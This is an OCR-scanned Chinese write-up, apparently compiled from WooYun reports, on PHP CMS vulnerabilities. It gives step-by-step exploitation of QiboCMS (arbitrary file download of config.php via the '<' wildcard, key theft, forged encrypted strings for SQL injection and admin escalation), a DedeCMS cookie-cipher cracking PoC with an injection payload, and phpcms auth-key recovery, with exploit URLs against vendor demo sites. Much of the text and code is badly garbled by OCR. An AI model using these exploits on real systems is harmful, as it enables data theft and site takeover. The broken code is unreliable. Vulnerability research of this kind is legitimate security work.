$_filename=preg_replace("/([\d]+)_(200[\d]+)_([4_]+)\.([A\.]+), 
if(eregi("4([a-z0-9=]+)$",$_filename)&&! eregi("(jpg|gif |png)$", 
$filename-urldecode(base64 decode($ filename)).".$filetype' 

j 
ob end clean(); 
header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT 
header('Pragma: no-cache'); 
header('Content-Encoding: none'); 
header('Content-Disposition: attachment; filename='.$filename) , 
header('Content-type: '.$filetype); 
header('Content-Length: '.filesize(ROOT PATH."$fileurl")); 
readfile(ROOT PATH."$fileurl"); 

在 这 里 调用 了 is_file 这 有 函数 来 检测 文件 是 否 存在 ,如 果 存 在 的 话 才 会 进入 这 语 匈 块 。 

由 于 匹配 出 .php 就 会 退出 。 能 有 什么 办 法 呢 ? 

这 里 我 们 来 fuzz is_ file 这 函数 一 下 。 





<?php 

for ($i=0; $i«255; $i++) { 
$yu = '1.ph' . chr($i); 
$yul = Qis file($yu); 

if (!empty($yu1))( 

echo chr($i); 

echo "«/br»"; 

j 

j 


?> 


在 本 地 新 建 一 个 1.php 的 文件 。 然 后 is_file 看 看 有 神 么 能 输出 来 。 


三 Load URL http://web.com/5.php 
® Split URL 
» Execute 


|| Enable Post data | | Enable Referre 


UE "Ep eom IS 


WWW.WoOoyun.org 
可 以 看 到 除开 P p 还 有 其 他 的 
因为 开启 了 i 所 以 Pp 都 不 行 来 试 试 < 
<?Php 
$a-$ GET[a]; 
$b-is file($a); 


var dump($b); 


ys) Load URL http://web.com/yux.php?a- 1.ph 


o split URL | 


» Execute 
|| Enable Post data | | Enable Referrer 


bool (false) 


www.wooyun.org 


x) Load URL  |http://web.com/yux.php?a- 1.ph«| 


Split URL | 
» Execute 


|] Enable Post data | | Enable Referrer 


bool (true) 


www.wooyun.org 
可 以 看 到 1.ph< 返回 了 true 这 样 不 就 可 以 绕 过 这 个 的 过 滤 了 ? 


因为 我 看 英文 看 不 怎么 懂 。。 那些 什么 翻译 MERLAERT 一 大 堆 翻译 错误 
的 。 


以 下 是 我 的 理解 可 能 有 错 也 请 大 牛 来 指导 指导 了 。 
因为 当 PHP 解 析 器 解析 这 些 函 数 的 时 候 会 调用 winapi 
调用 了 Winapi 的 函数 Findfirstfile 
后 < 字符 被 转换 成 了 * 成 了 通配符 。 
所 以 导致 1.ph< 找到 了 1.php。 
也 就 导致 了 这 个 漏洞 的 产生 。 
这 里 不 止 is_flle 函 数 调用 了 这 个 api 大 部 分 的 函数 都 调用 了 这 个 api 


@ LoadURL | http://web.com/yux.php?a=1.ph< 
Q Spit URL 


as) 


[E] Enable Post data | | Enable Referrer 


Warning: unlink(l.phX) [function. unlink]: Invalid argument in D: \ApmServ\www\htdocs 
\yux. php on line 7 
bool (false) 


www.wooyun.org 


TAA Fl unlink hA 3x Zr ABA 9 
没 调用 这 api 的 函数 大 概 有 unlink、rename、rmdir 就 这 三 个 了 。 
其 他 的 函数 基本 都 调用 了 。 


上 面 那个 介绍 完了 , 继续 回 到 qibocms。 » 


if( is file(ROOT PATH."$fileurl") ){ 
$filename-basename($fileurl); 
$filetype=substr(strrchr($filename,'.'),1); 
$_filename=preg_replace("/([\d]+)_(200[\d]+)_([4_]+)\.([A\.]+), 
if(eregi("4([a-z0-9=]+)$",$_filename)&&! eregi("(jpg|gif |png)$", 

$filename-urldecode(base64 decode($ filename)).".$filetype' 

} 
ob end clean(); 
header('Last-Modified: '.gmdate('D, d M Y H:i:s',time()).' GMT 
header('Pragma: no-cache'); 
header('Content-Encoding: none'); 
header('Content-Disposition: attachment; filename='.$filename) , 
header('Content-type: '.$filetype); 


header('Content-Length: '.filesize(ROOT PATH."$fileurl")); 


readfile(ROOT_PATH."$fileurl"); 





在 这 里 通过 is_file 的 判断 后 。 


$filename-basename($fileurl); 
$filetype=substr(strrchr($filename,'.'),1); 
$_filename=preg_replace("/([\d]+)_(200[\d]+)_([4_]+)\. CE^N. ]*)» 
if(eregi("4([a-z0-9=]+)$",$_filename)&&! eregi("(jpg|gif |png)$", 


$filename-urldecode(base64 decode($ filename)).".$filetype' 


4 = 








对 这 些 有 进行 了 各 种 处 理 , 但 是 我 没 搞 懂 对 这 些 的 处 理 有 什么 用 ? 
readfile(ROOT PATH."$fileurl") 
最 后 带 入 readfile 的 是 $fileurl » 


Come on 利用 来 吧 。 


$url=trim(base64_decode($url)); 
$fileurl-str replace($webdb[www url],"",$ur1l); 


if( eregi(".php",$fileurl) && is file(ROOT. PATH."$fileurl") ){ 
die("ERR"); 


这 里 由 于 会 先 解码 所 以 首先 要 自己 编码 一 次 。 
这 里 我 们 来 下 载 data/config.php 这 文件 。 

对 data/config.php base64 encode 

试 试 


~ Load URL | htttp://v7.qibosoft.com/{do/job. php?job=download&fid=40&id=6628rid=6438i_id=348mid=101&field=softurl&ti=O&url=ZGFOYS9jb25maWcucGhwLg==| 
Q Split URL + 
^ Execute 
[E] Enable Post data [F] Enable Referrer 
ERR 


www.wooyun.org 


被 匹配 出 了 再 对 data/config.ph< base64 encode 


uwi 





| ow o Dun aoo cuybuur CLUNY VUIT 
码 Load URL http://v7.gibosoft.com//do/job.php?job- download&fid - 408id=6628rid=6438i_id=34&mid=101&field=softurl&ti=O8url=Z2GFOYS9jb25mawcucGgs 
Q Split URL 
^ Execute 
[E] Enable Post OBL dcn 
ERR 您 已 选择 打开 


Æ config.ph_ 
为 : HTML Document (8.7 KB) 
来 源 : http://v7.aibosoft.com 


您 想 要 Firefox 如 何 处 理 此 文件 ? 


© 打开 方式 (D) Internet Explorer (A) 
e matt) 





O 以 后 自动 采用 相同 的 动作 处 理 此 类 交 件 。(&) 








www.wooyun.org 


成 功 下 载 到 配置 文件 


这 里 如 何 让 任意 文件 下 载 变 成 注入 ? 
这 里 qibocms 里 面 有 一 个 加 密 解 码 的 函数 
function mymd5($string,$action="EN",$rand=''){ // 字 符 串 加 密 和 解密 
global $webdb; 
if($action=="DE"){// 处 理 + 号 在 URL 传 递 过 程 中 会 异常 
$string = str replace('QIBO|ADD', '+', $string); 
j 
$secret string = $webdb[mymd5].$rand.'5*j, .%&;?.%H@!'; //!& RF 
if(!is_string($string) ){ 
$string=strval($string); 
j 
if($string==="") return ""; 
if($action=="EN") $md5code=substr(md5($string),8,10); 
else{ 
$md5code=substr($string, -10); 
$string-substr($string,O,strlen($string)-10); 
j 
//$key = md5($md5code.$ SERVER["HTTP USER AGENT"].$secret strir 
$key = md5($md5code.$secret string); 
$string = ($action=="EN"?$string:base64_decode($string) ); 
$len = strlen($key); 
$code = ""; 
for($i=0; $i<strlen($string); $i++){ 
$k = $i%$len; 


$code .= $string[$i]^$key[$k]; 


$code = ($action == "DE" ? (substr(md5($code),8,10)--$md5code?: 
if($action=="EN"){// 处 理 + 号 在 URL 人 和 传递 过 程 中 会 异常 
$code = str_replace('+', 'QIBO|ADD', $code); 


} 


return $code; 

















这 里 的 key 是 保存 到 配置 文件 里 面 的 , 当 我 们 拿 到 key 过 后 就 可 以 调用 这 函数 自己 来 
生成 一 个 加 密 的 字符 串 。 


再 找 哪里 调用 了 这 函数 来 解密 的 。 这 样 就 无 视 了 qibocms 的 全 局 转 义 。 
key 就 是 保存 到 data/config.php 里 面 的 刚才 通过 任意 文件 下 载 已 经 拿 到 了 。 


Luo QYCDUDL 1121 Il1CIlIdHCZL JT 1121. HL 中 下 水 本] HAST 
169 $webdb [° Ftp st^]5^ 121. 0. 0. 1^; 

170 $webdb[ De uo ad. readfile’ ]- ias 

IU $webdb[’ yzIngAdninLogin ]=" 0 ; 

172 $webdb [’ AutoCutFace' s o . 
173 $webdb[’ cookieDonain’ ]-''; 

174 $webdb [’ boliase id ls E 

175 $webdb[ miibeian_ go cn’ ]=: RICP 050453 

176 $webdb[' copyright’ i". 

177 Swebdb[’ nmas =" Ca 

178 $vebdb[ c ompanyTrade’ i= 机 “it, AT Nb RS 

179 CA 4H dit E m www.wooyun.org 


还 是 给 官方 的 key 打 个 码 、 
来 找 找 哪里 调用 了 这 函数 的 。 
首先 在 member/yz.php 里 面 


elseif($action=='mobphone2 ) 
{ 
if ($1fjdb[mob_yz]){ 
showerr(" 请 不 要 重复 验证 手机 号 码 1" ) ; 
j 
if(!$yznum) { 
showerr(" 请 输入 验证 码 " ) ; 
selseif (!$md5code) { 
showerr(" 资 料 有 误 ") ; 
jelse( 
unset ($code, $mobphone, $uid) ; 
list ($code, $mobphone, $uid )=explode("\t",mymd5($md5code, "DE' 
if ($code!=$yznum| | $uid!-$1fjuid)( 


showerr(" 验 证 码 不 对 ")， 


} 


add_user ($1fjuid, $webdb[Yz_MobMoney],' 手 机 号 码 审 核 奖 分 ' ) ; 


$db->query("UPDATE {$pre}memberdata SET mobphone='$mobphone' , m 





这 里 调用 了 mymd5 而 且 是 decode 所 以 解码 后 就 能 直接 注入 了 。 


而 且 可 以 发 现 Update 的 表 是 memberdata 这 个 表 里 面 groupid column 就 是 用 来 判断 
是 不 是 管理 员 的 。 


而 且 $mobphone 是 解码 后 来 的 而 且 直接 在 set 位 这 里 只 要 稍微 构造 一 下 
就 可 以 直接 update groupid=3 然后 就 提升 自己 为 管理 员 了 。 
这 里 在 之 前 的 图 片 系统 里 提 到 过 就 不 多 说 了 。 


在 inc/common.inc.php 中 登录 后 台 的 时 候 也 调用 了 这 个 


if ($_COOKIE["adminID" ]&&$detail=mymd5($_COOKIE["adminID"], 'DE', $on: 
unset($ uid,$ username,$ password); 
list($ uid,$ username,$ password)-zexplode("Nt",$detail); 


$1fjdb=$db->get_one("SELECT * FROM {$pre}memberdata WHERE uid- 


j 


«| d 








mymd5($_COOKIE["admin|D"],'DE',Sonlineip) 
这 里 解码 的 时 候 还 调用 了 $onlineip 进 了 第 三 个 参数 


$secret string = $webdb[mymd5].$rand.'5*j,.°&;?. %#@!"; /绝密 字符 串 ,可 以 任意 设 
定 


可 以 看 到 第 三 个 参数 是 进 了 这 个 变量 然后 带 入 了 加 密 中 看 看 $onlineip 怎 么 来 的 。 
来 看 看 全 局 文件 


if($ SERVER['HTTP. CLIENT IP'])( 
$onlineip-$ SERVER['HTTP CLIENT IP']; 
}elseif ($_SERVER[ 'HTTP_X_FORWARDED_FOR' ]) { 
$onlineip=$_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; 
selse{ 
$onlineip=$_SERVER[ 'REMOTE_ADDR' ]; 
j 
$onlineip = preg replace("/^([NdN.]*).*/", "NM", filtrate(S$online: 
preg_match("/[\d\.]{7,15}/", $onlineip, S$onlineipArray); 
$onlineip = $onlineipArray[O] ? $onlineipArray[0] : '**.**.**,**'; 
EJE] 
可 以 看 到 是 获取 的 xff 但 是 后 面 用 了 正则 来 验证 ip 是 否 合法 
如 果 不 合法 的 话 就 return 的 是 ... 这 里 我 们 就 随便 让 xff 不 合法 就 行 了 
后 把 ... 带 入 到 加 密 函 数 当 中 





不 多 说 了 直接 调用 一 下 函数 生成 一 下 加 密 的 字符 串 。 


e QV: 3 web.com/fuck.php?a=yu'%09aa%09aa 


访问 最 多 “ | EasyTak Administrato.. $ 90sec 信 息 安全 小 组 KI Exploit-DB 漏 洞 公 布 ; Eas 


INT y = $9 SQL- X557 Encryption" Encodings Other- 
4 Load URL http: //web.com/fuck.php?a=yu%27 Yo09aa%09aa 
Split URL 


| Execute | 
[E] Enable Post data | | Enable Referrer 


HBQeOAMFbVBReac95ed61la 





www.wooyun.org 


在 测试 demo 的 时 候 发 现 竟然 不 报错 。 


db Split URL USeT-AYeril: IIDIZllid; OU LYI UUW IN E D. Lj TY Le.) DELKUIEULUULUL 
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*:q 
» Execute Accept-Language: 2h-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 
[7] Enable Post data [^] Enable Referrer Accept-Encoding: gzip, deflate 


Connection: keep-alive 

x-forwarded-for: HBQeOAMFbYBReac9Se 

Referer: http://v?.gibosoft.com/admin/ 

Cookie: adrninID- HBQeOAMFbVBReac9Sed61a; 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 48 





[F| Send POST Content ? 
loginname = aa&loginpwd- aa&Submit.x- 38&Submit.y-22 





用 户 不 存在 


oak www.wooyun.org 


这 怎么 可 能 呢 ? 后 面 想 了 一 想 


$secret string = $webdb[mymd5].$rand.'5*j,.°&;?. %#@!"; /绝密 字符 串 ,可 以 任意 设 
z 


$rand 后 面 设 定 的 是 可 以 任意 设 定 的 可 能 demo 修 改 了 。 
然后 果断 继续 利用 刚才 的 方法 下 载 inc/function.inc.php 
function mymd5($string, $action="EN", $rand=''){ // 字 符 串 加 密 和 解密 
global $webdb; 


$secret_string = $webdb[mymd5].$rand.'5*j, ..&;?.%#@!=67987d' 
El — F 





呵呵 demo ZR f PT 9 把 这 个 修改 后 继续 调用 一 下 这 函数 再 生成 一 下 语句 。 





(28 VOPR | 5 Edsy |dKK UNTILUdtU J JOELA EEDA MON CADIUILC-UDERUSEZSAD L 


INT xæ $ SQL XSS- Encryptiony Encoding- Other- 
© Load URL 
Q Split URL 
» Execute 





[E] Enable Post data Enable Referrer 
数据 库 连 接 出 错 :SELFECT * FROM qibosoft memberdata WHERE uid-'yu'' AND username-' aa’ 











You have an error in your SQL syntax. Check the manual that corresponds to your MySQL s 


1064 


成 功 报错 。 





POST ~| http://v7.gibosoft.com/adrnin/ 


HTTP Headers 

User-Auer iL; MULI S.L UNIT IUUWws NT 2. EATA] VELK 
Accept: text/html, application/xhtml+xml, application/xml; 
Accept-Language: zh-cn,zh;q-0.8,en-us;q-0.5,en;gq-0.: 
Accept-Encoding: gzip, deflate 

Connection: keep-alive 
x-forwarded-for:HBQeOAMFbVBReac9Se 

Referer: http://v7.gibosoft.cor/admin/ 

Cookie: adminID=HOAWbAMEaATEeaco5ed6 1a; 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 48 


www.wooyun.org 


后 面 的 不 用 多 说 了 。 生成 一 个 加 密 的 报错 注入 的 语句 就 能 注入 了 。 


不 想 多 说 。 


` ` 


A^ HE 
修复 方案 
漏洞 的 源头 是 任意 文件 下 载 。 


过 滤 < 等 特殊 字符 。 





他 多 个 地 方 注入 。 





0x06 Ae 2 H žr PJA o 


这 种 问题 主要 是 想 进 各 种 办 法 把 这 些 加 密 函 数 的 key 拿 到 或 者 想 办 法 加 密 一 些 特殊 
字符 然后 拿 到 加 密 的 字符 串 


加 密 函 数 肯 定 就 涉及 到 了 各 种 萌 法 。 


Jm 98 v] 3. 


算法 问题 一 般 主要 是 因为 一 些 弱 算法 导致 了 知道 明文 知道 密 文 TH 
拿 到 加 密 函 数 中 的 key 从 而 再 自己 生成 一 个 自己 想 要 的 加 密 字符 串 。 
再 结合 具体 的 点 然后 进行 具体 的 利用 。 


例子 : WooYun: DedeCMS-V5.7-SP1(2014-07-25)sql 注 入 + 新 绕 过 思路 例子 : 
WooYun: phpcms 最 新 版 绕 过 全 局 防御 暴力 注入 (官网 演示 ) 


ha BEY d 


还 有 的 一 类 算是 一 个 点 要 加 密 的 是 我 们 可 控 的 而 且 密 文 会 输出 而 且 这 个 可 控 的 点 
能 引入 特殊 字符 那么 我 们 就 把 一 些 特殊 字符 带 入 到 这 里 面 然后 拿 到 密 文 再 找到 一 
处 decode 后 会 进行 特殊 操作 的 点 然后 进行 各 种 操作 。 

例子 : WooYun: RA CMS $E > Fasq a 


例子 : WooYun: PHPCMS 最 新 版 (V9)SQL 注 入 一 枚 


key tX 


例子 : WooYun: 一 个 PHPWIND 可 拿 shell 的 高 危 漏 洞 
例子 : WooYun: PHPCMS V9 — 4-73 PT £x 7] 8] J iH] 


WooYun-2014-71655 : DedeCMS-V5.7- 
SP1(2014-07-25)sql 注 入 + 新 绕 过 思路 
漏洞 作者 : roker 

来 源 : http://www.wooyun.org/bugs/wooyun-2014-071655 


ey 好 紧张 。。 


详细 说 明 

让 我 们 来 看 看 这 个 文件 

/include/shopcar.class.php 

提取 关键 加 解密 函数 代码 

function enCrypt($txt) 
{ 

srand((double)microtime() * 1000000); 
$encrypt_key = md5(rand(0, 32000)); 
$ctr = 0; 
Stmp = 


for($i = 0; $i < strlen($txt); $i++) 


$ctr = $ctr == strlen($encrypt_key) ? © : $ctr; 


$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ct 


return base64_encode($this->setKey($tmp) ); 


} 


// 解 密 接口 字符 囊 


function deCrypt($txt) 


{ 


} 


$txt = $this->setKey(base64_decode($txt)); 
comptes 
for ($i = 0; $i < strlen($txt); $i++) 
{ 
$tmp .= $txt[$i] ^ $txt[++$i]; 


j 


return $tmp; 


// 处 理 加 密 数 据 


function setKey($txt) 


{ 
global $cfg_cookie_encode; 
$encrypt_key = md5(strtolower($cfg cookie encode)); 
$ctr - 0; 
$tmp = ''; 
for($i = 0; $i < strlen($txt); $i++) 
{ 
$ctr = $ctr == strlen($encrypt_key) ? © : $ctr; 
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; 
} 
return $tmp; 
} 
// 串 行 化 数组 


function encode($array ) 


$arrayenc = array(); 
foreach($array as $key => $val) 
{ 
$arrayenc[] = $key.'='.urlencode($val); 
j 
return implode('&', $arrayenc); 
j 
//€|3$ 2a 8) cookie 


function saveCookie( $key, $value) 


{ 
if(is_array($value) ) 
{ 
$value = $this->enCrypt($this->enCode($value) ); 
j 
else 
{ 
$value = $this-»enCrypt($value); 
j 
setcookie($key, $value, time()+36000, '/'); 
j 


// 获 得 解密 的 _cookie 
function getCookie($key) 
{ 
if(isset($_COOKIE[$key]) && !empty($_COOKIE[$key] ) ) 


{ 


return $this->deCrypt($_COOKIE[$key]); 








ETER EIRA ? 3x € --http;//**.**.**.**/bugs/wooyun-2014-062391 


一 样 的 算法 ， 只 不 过 将 microtime 替换 成 了 mdb(rand(0, 32000)),4z R& IRA 85 zr 
法 的 话 ， 我 们 需要 暴力 FRIIK BRAK? RARE? RIAN FLAK 


BEA? 


直接 来 看 看 解密 函数 吧 。 


function deCrypt($txt) 

{ 
$txt = $this-»setKey(base64 decode($txt)); 
$tmp = ''; 
for ($i = 0; $i < strlen($txt); $i++) 
{ 

$tmp .= $txt [$i] ^ $txt[++$i]; 

j 
return $tmp; 

j 

// 处 理 加 密 数 据 


function setkey($txt) 


{ 
global $cfg_cookie_encode; 
$encrypt key = md5(strtolower($cfg_cookie_encode) ); 
$ctr = 0; 
$tmp = ''; 
for($i = 0; $i < strlen($txt); $i++) 
{ 
$ctr = $ctr == strlen($encrypt_key) ? © : $ctr; 
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++]; 
} 
return $tmp; 
} 


现在 我 们 假设 密 文 为 ABCDEF.... (base _decode 后 的 ) 。 通 过 上 述 代码 可 以 发 
I 解密 函数 中 参与 运算 的 是 key 的 MD5 值 。 我 们 假定 为 K1 k2 K3 k4 k5 


首先 带 入 setKey £t > 


AAK1 ->M1 
BAK2 ->M2 
CAK3 ->M3 


DAK4 ->M4 


然后 将 M1~6 带 入 decrypt 后 的 操作 。 


M2^M1 ->a 
M4^M3 ->b 


M6^M5 ->c 


abc 即 为 我 们 的 明文 
对 于 蜡 或 算法 我 们 知道 它 有 以 下 特性 
TE Sab — HAS 


(HAI)AJ=HAIAJ 


ZLAB 与 明文 a 所 对 应 的 的 关系 为 。 


A^K1 = M1 M1^M2 = a BAK2 = M2 


联 立 得 ( 尼 玛 像 是 在 做 奥数 。。) A^K1^B^K2 =a BP A^B^a = K1^K2， 同 理 可 得 到 
C^D^b = K34K4 E^F^c-K5^K6 


k1~32 是 密 是 k 的 32 位 md5 值 ， 是 固定 不 变 的 。 


那么 得 到 如 下 如 下 关系 : 任何 密 文 的 | ，i+1 位 与 其 所 对 应 的 的 明文 的 1 位 做 异 
或 运算 (i 为 偶数 ) 结果 是 一 个 国定 不 变 的 值 (Ki^Ki+1) 


sO， 我 们 只 需要 一 个 已 知 明文 的 密 文 就 可 以 构造 任意 密 文 了 。 
poc 如 下 ， 
function dede_cracked($Expressly, $Ciphertext, $str, $way){ 


$Ciphertext = base64_decode($Ciphertext); 


if ($way=="descrypt"){ 
$text2=""; 

$str-base64 decode($str); 
selse{ 


$text2-z"a"; 


for ($i=0;$i<strlen($str);$it++, $s++){ 
if ($j==32) {$j=0; $s=0; } 
$tmp=$Ciphertext [$j ]*$Ciphertext[$j+1]; 
$tmp-$tmp^$Expressly[$s]; 
$tmp-$tmp^$str[$i]; 

if ($way=="descrypt") { 
$texti-$tmp^$str[--$1i]; 

j 

else{ 

$texti-$tmp^$text2; 

j 

$xxoo -$xxoo.$text2.$text1; 

$j=$j+2; 

j 

if ($way=="descrypt") { 

echo $xxoo;} 

else{ 


echo base64 encode($xxoo);) 


j 


在 plus/carbuyaction.php 


foreach($Items as $key=>$val) 


{ 
$val['price'] = str_replace(",","",$val['price 
$dsql->ExecuteNoneQuery("INSERT INTO ~#@__shop: 
VALUES ('$val[id]','$0OrdersId', '$userid', '$val| 
j 


加 二 一 | 





将 解密 后 的 数据 带 入 了 数据 库 。 


本 以 为 到 这 里 就 结束 了 ， 然 而 ，dede 自 带 的 防护 sq| 注 入 的 函数 做 了 更 新 ， 以 前 的 
@，char 都 不 能 用 了 。 


想 了 很 久 终 于 想到 了 办 法 ， 


我 们 可 以 用 双 引 号 来 包 里 ' 再 用 过 号 分 隔 两 个 相连 的 "。 


看 到 部 数 里 的 这 段 代 码 你 就 知道 为 什么 我 要 这 么 做 了 。。 直 接 看 我 的 下 面 的 Sql 语 句 可 能 会 


if (strpos($clean, '@') !== FALSE OR strpos($clean, 'char(')!== FAI 


OR strpos($clean,'$s$$s$')!-- FALSE) 
is] 








Y St > ` B Ba : 
首先 ， 注 册 用 户 ， 将 一 个 商品 加 入 购物 车 ， 来 到 plus/carphp 页 面 ， 此 时 查看 cookie 
rererer: nitp;//iocamost/ pius/postrocar.pnp 
Cookie: PHPSESSID-34237aad8abdce6ef482be934b8a8915; DedeUserID=8; DedeUserID_ckMd5=1dd38adc3b8213ce; DedeLoginTime=1407516077; DedeLoginTime _， 
OrdersldZUAAKdQJTDzADYVAOVDYAMAQzCjoBNVFoBWFRBVxKUDUPOAJk; 


Shop De 108-BW8CNFFtWGcHYVc7VCcAdVQgB2gFYIA1BGIVYIB2VycFcwM962FA2sMdIlN2UDkDcFcwD3wLdFE7VSAHOIphAWhVJQVyAjIRJFg6BzRXPIRgGAGQ963D 
X-Forwarded- 'aa.aa'.aa'.aa' 
Connection: keep jive 





我 的 购物 车 - 订单 号 :S-P1407516094RN344 


商品 列表 
选择 N” j 名 称 jf ng i NN 


E 108 aa 1 11.00 


Shop_De 开 头 的 和 DedeUserlD 就 是 我 们 所 需要 的 ~ 
38 A poc €. $5 $ žk 


得 到 最 终 playload 


dede_cracked("id=108&price=11&units=&buynum=1atitle=aa", 'AwgGMlFrA: 
d EX 














修改 cookie， 提 交 订 单 
可 以 看 到 mysql 的 执行 日 志 
INSERT INTO ‘dede shops products ('^aid' , oid’, userid’, title’, pi 
VALUES ('',"'','wooyuni','8','" or ',','8',(SEI 
Em HR 
查看 商品 ，ok， 数 据 出 来 了 ~ 





Hey i] HE 8H 


CET MEE TEE: 





会 员 升 级 /点 卡 充值 ”点 卡 / 会 员 定单 ”我 购买 的 文章 。“ 商品 定单 ”我 购买 的 商品 
购买 的 商品 


订单 号 SL 单价 (元 /单位 ) à 
E] 0 admin#f2974a57a5a743894a0e4 0.00 
A ~ 
修复 方案 


HRA] 2% sk ~~ 


WooYun-2014-66138 : phpcms X 31 Ze 3d 4 E) ET 
御 暴 力 注入 (官网 演示 ) 


漏洞 作者 : 索马里 的 海 贱 


来 源 : http://www.wooyun.org/bugs/wooyun-2014-066138 


fal E 要 描述 还 


加 解密 函数 缺陷 第 三 发 ， 注 入 演示 版 本 20140522 无 视 全 局 防御 搬 个 沙发 吧 。。 这 
个 比 destoon 那 个 要 麻烦 多 了 。。。 


详细 说 明 
先 从 函数 说 起 
phpcms/libs/functions/global.func.php 行 335 


function sys_auth($string, $operation = 'ENCODE', $key = '', $expi! 
$key_length = 4; 
$key = md5($key != '' ? $key : pc_base::load_config('system', 
$fixedkey = md5($key); //keya 用 于 加 解密 


$egiskeys = md5(substr($fixedkey, 16, 16)); //keyb 用 于 数据 完整 性 


$runtokey = $key length ? ($operation == 'ENCODE' ? substr(mdb5i 
$keys = md5(substr($runtokey, ©, 16) . substr($fixedkey, ©, 16 
$string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? : 
$i = 0; $result = ''; 

$string_length = strlen($string); 

for ($i = 0; $i < $string_length; $i++){ 


$result .= chr(ord($string{$i}) ^ ord($keys{$i % 32})); //i 


j 
if($operation == 'ENCODE') { 
return $runtokey . str_replace('=', '', base64 encode($resi 
) else { 
if((substr($result, ©, 10) == © || substr($result, ©, 10) - 
return substr($result, 26); 
} else { 
return ''; 
j 
j 





这 里 用 的 其 实 是 简化 版 的 经 典 加 密 函 数 auth_code 由 DZ 开始 广泛 用 于 各 类 cms 


这 里 去 掉 了 密 钥 簿 的 生成 和 转换 直接 用 kaya 和 keyc 组 合 md5 之 后 的 值 keyd 作 为 密 
钥 簿 然后 与 原始 文本 处 理 后 的 数据 进行 异 或 。 


讲 加 密 过 程 有 点 绕 ， 我 也 没有 刺 总 的 口才 能 把 这 个 函数 说 那么 细 ， 反 正 这 里 知道 一 
点 就 够 了 


如 果 知 道 原始 文本 和 加 密 后 的 文本 ， 而 且 原 始 文本 的 长 度 够 长 (准确 说 是 明文 内 容 
的 长 度 大 于 32*2-10-16=38 位 ) ， 是 可 以 逆 推 出 keyd 的 。 


在 这 个 Hd > keyc 就 是 IV (初始 化 向 量 ) > ckey length 就 是 IV 的 长 度 :4。keyc 
影响 到 每 次 加 密 的 xor key (也 就 是 keyd) 。 这 里 先 说 这 么 多 ， 先 来 看 看 phpcms 的 
问题 


/phpcms/modules/memeber/index.php 行 176 


if($member setting['enablemailcheck']) { 
pc base::1load sys func('mail'); 

$phpcms auth key = md5(pc base::load config('system', 'auth ke 

$code = sys auth($userid.'|'.$phpcms auth key, 'ENCODE', $phpcr 

$url = APP PATH."index.php?m-member&c-index&a-register&code-$c« 

E ad 


在 注册 过 程 中 如 果 后 台 配 置 了 需要 邮件 认证 ， 那 么 就 会 进入 这 个 ii 生成 一 串 校 验 值 
发 往 注 册 的 邮箱 。 





$phpcms_auth_key = md5(pc_base::load_config('system', 'auth key')), 
二 | 
这 个 auth_key 其 实 就 是 核心 加 密 key， 这 里 居然 把 md5 后 的 核心 key 作 为 参数 的 一 部 


分 写 入 激活 链接 发 到 用 户 邮 箱 了 。 如 果 能 够 解 开 激活 链接 中 的 这 个 code 值 ， 我 们 就 
可 以 得 到 加 密 key 从 而 任意 生成 加 密 串 了 。 参 数 $code 生 成 方式 为 


as) 


sys_auth($userid.'|'.$phpcms_auth_key, 'ENCODE', $phpcms auth key), 
doo; o 
sys_auth()/#] 55 % 4A A md5(‘auth_key’); 
收 到 邮件 中 的 链接 如 下 
欢迎 您 注册 成 为 phpcms 用 户 ， 您 的 账号 需要 邮箱 认证 ， 5 击 下 面 链接 进行 认证 : Bar 或 者 将 网 址 复制 到 浏览 


器 : /192.168.1.114/index vm 'msmember&czindex&azregister&code zdlO4CAqgC 
'IBAAMAA/wldAAYEXQONUQAKSFECWQ /|gAIAApUUIZUUOITUIZRAASUAOFRDABW X10F 














www.wooyun.org 


code 值 为 


d104CAgCBwZUAVYFVVIBAAVVVwIdAAY EXQoNUQAKSFECWgAIAApUUIZUU 
QJTUIZRAA9UAQFRDABWX10FVVtV 


前 4 位 为 keyc 这 里 是 "d104" 

如 果 我 们 能 找到 另外 一 处 明文 和 密 文 都 可 知 且 可 以 多 次 用 同一 明文 获取 密 文 的 位 置 
就 能 通过 遍历 找 出 相同 的 keyc， 当 keyc 相 同时 xor key 也 相同 ， 所 以 我 们 就 能 用 前 
面 说 方法 逆 推 出 keyd 来 解密 出 code 的 内 容 。 


首先 是 找到 一 处 同样 用 md5(pc_base::load_config('system', 'auth_key')) 作 为 密 钥 ， 
且 我 们 可 以 同时 知道 明文 和 密 文 的 地 方 。 


/phpcms/modules/content/down.php 行 76 
if(strpos($f, 'http://') !== FALSE || strpos($f, 'ftp://') !== FAL 
$pc_auth_key = md5(pc_base::load_config('system', 'auth_key').$_ 


$a k = urlencode(sys auth("i-$i&d-$d&s-$s&t-".SYS TIME."&ip-".: 


$downurl = '?mzcontent&c-down&a-download&a k-'.$a k; 
) else { 
$downurl = $f; 





当 我 们 把 user-agent 置 空 的 时 候 
$pc_auth_key 正 好 就 是 我 们 需要 的 


md5(pc_base::load config('system','auth key').""); 


加 密 的 字符 串 为 


"i-$i&d-$d&s-$s&t-".SYS TIME."&ip-".ip()."&m-".$m. "&f-$f&modelid-" 
[i| sm ————————————— À i —Ór 





$i 就 是 下 载 的 id 从 页 面 可 以 获得 $d 是 downloadtype 一 般 是 1 $s 空 $t 是 时 间 。 可 以 从 
http 头 获取 到 $ip 可 知 $m 为 1 $f 是 下 载 文件 的 Ur| 这 里 长 度 肯定 超过 38 了 。 

先 来 获取 邮件 中 的 code， 为 了 增加 碰撞 的 概率 这 里 用 多 个 邮箱 多 次 获取 了 激活 链 
接 并 收集 激活 链接 中 参数 code 的 前 4 位 (IV) 记录 下 来 。 


it PHP 常见 漏洞 


会 员 注 册 osses © 邮箱 验证 O iuh 


nidayel 你 好 ， 请 进行 邮箱 认证 。 请 点 击 登 录 邮 箱 
如 果 没 有 收 到 邮件 ， 请 点 击 这 里 更 换 邮箱 试 试 


BES i .o.com | 重新 发 送 新 邮箱 验证 


www.wooyun.org 
j apache 注册 会 员 验 证 邮件 - 欢迎 您 注册 成 为 Phpcms 用 户 ， 您 的 
